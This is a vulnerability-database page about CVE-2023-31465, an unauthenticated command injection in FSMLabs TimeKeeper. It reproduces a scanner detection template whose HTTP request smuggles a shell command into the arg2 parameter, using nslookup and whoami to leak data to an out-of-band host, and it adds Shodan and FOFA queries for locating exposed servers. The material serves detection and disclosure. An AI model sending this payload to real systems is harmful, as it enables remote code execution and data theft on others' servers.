| Reporter | Title | Published | Views | Family All 13 |
|---|---|---|---|---|
| CVE-2023-31465 | 26 Jul 202320:15 | – | attackerkb | |
| The vulnerability of the FSMLabs TimeKeeper software synchronization mechanism, related to insufficient validation of input data, allows a hacker to execute arbitrary code. | 22 Nov 202300:00 | – | bdu_fstec | |
| CVE-2023-31465 | 22 Oct 202322:26 | – | circl | |
| FSMLabs TimeKeeper 安全漏洞 | 26 Jul 202300:00 | – | cnnvd | |
| CVE-2023-31465 | 26 Jul 202300:00 | – | cve | |
| CVE-2023-31465 | 26 Jul 202300:00 | – | cvelist | |
| CVE-2023-31465 | 26 Jul 202320:15 | – | nvd | |
| CVE-2023-31465 | 26 Jul 202320:15 | – | osv | |
| Integer overflow | 26 Jul 202320:15 | – | prion | |
| PT-2023-6978 · Fsmlabs · Fsmlabs Timekeeper | 26 Jul 202300:00 | – | ptsecurity |
id: CVE-2023-31465
info:
name: TimeKeeper by FSMLabs - Remote Code Execution
author: ritikchaddha
severity: critical
description: |
An issue was discovered in FSMLabs TimeKeeper 8.0.17 through 8.0.28. By intercepting requests from various timekeeper streams, it is possible to find the getsamplebacklog call. Some query parameters are passed directly in the URL and named arg[x], with x an integer starting from 1; it is possible to modify arg[2] to insert Bash code that will be executed directly by the server.
impact: |
Unauthenticated attackers can inject Bash commands through the arg[2] parameter in getsamplebacklog endpoint to execute arbitrary commands on the server, potentially compromising the entire TimeKeeper time synchronization infrastructure.
remediation: |
Update FSMLabs TimeKeeper to a version newer than 8.0.28 that properly sanitizes input parameters in getsamplebacklog and prevents command injection attacks.
reference:
- https://github.com/CapgeminiCisRedTeam/Disclosure/blob/main/CVE%20PoC/CVE-ID%20%7C%20RealGimm%20%20-%20Reflected%20Cross-site%20Scripting.md
- https://nvd.nist.gov/vuln/detail/CVE-2023-31465
- https://fsmlabs.com/fsmlabs-cybersecurity/
classification:
cvss-metrics: CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:H/A:H
cvss-score: 9.8
cve-id: CVE-2023-31465
epss-score: 0.44455
epss-percentile: 0.98611
cpe: cpe:2.3:a:fsmlabs:timekeeper:*:*:*:*:*:*:*:*
metadata:
max-request: 1
vendor: fsmlabs
product: timekeeper
shodan-query: http.favicon.hash:2134367771
fofa-query: icon_hash=2134367771
tags: cve,cve2023,timekeeper,rce,oast,fsmlabs,vkev,vuln
http:
- raw:
- |
GET /getsamplebacklog?arg1=2d0ows2x9anpzaorxi9h4csmai08jjor&arg2=%7b%22type%22%3a%22client%22%2c%22earliest%22%3a%221676976316.328%7c%7cnslookup%20%24(xxd%20-pu%20%3c%3c%3c%20%24(whoami)).{{interactsh-url}}%7c%7cx%22%2c%22latest%22%3a1676976916.328%2c%22origins%22%3a%5b%7b%22ip%22%3a%22{{Hostname}}%22%2c%22source%22%3a0%7d%5d%2c%22seriesID%22%3a3%7d&arg3=undefined&arg4=undefined&arg5=undefined&arg6=undefined&arg7=undefined HTTP/1.1
Host: {{Hostname}}
matchers-condition: and
matchers:
- type: word
part: interactsh_protocol
words:
- dns
- type: word
part: body
words:
- '{"seriesID":'
# digest: 4b0a00483046022100cb018a472285b446f7b2e6491e37154929d20139104274a0efe71db78bac3f2c022100f4c038ecd2e9a17c92b070146ad44295d64b90442cd7a6999c6eed7e13f2aec7:922c64590222798bb761d5b6d8e72950Data
Build on a solid foundation with Vulners data
We provide the essential building blocks for cybersecurity solutions with comprehensive, structured, and constantly updated vulnerability and exploits data
Api
Power your application with Vulners API
The Vulners REST API offers reliable, high-performance access to vulnerability intelligence, with 99.9% SLA uptime and CDN-backed data delivery for seamless global access
App
Assess and manage vulnerabilities with Vulners tools
Built on top of Vulners' database and SDK, end-user solutions give security professionals and developers lightweight and powerful tools for vulnerability remediation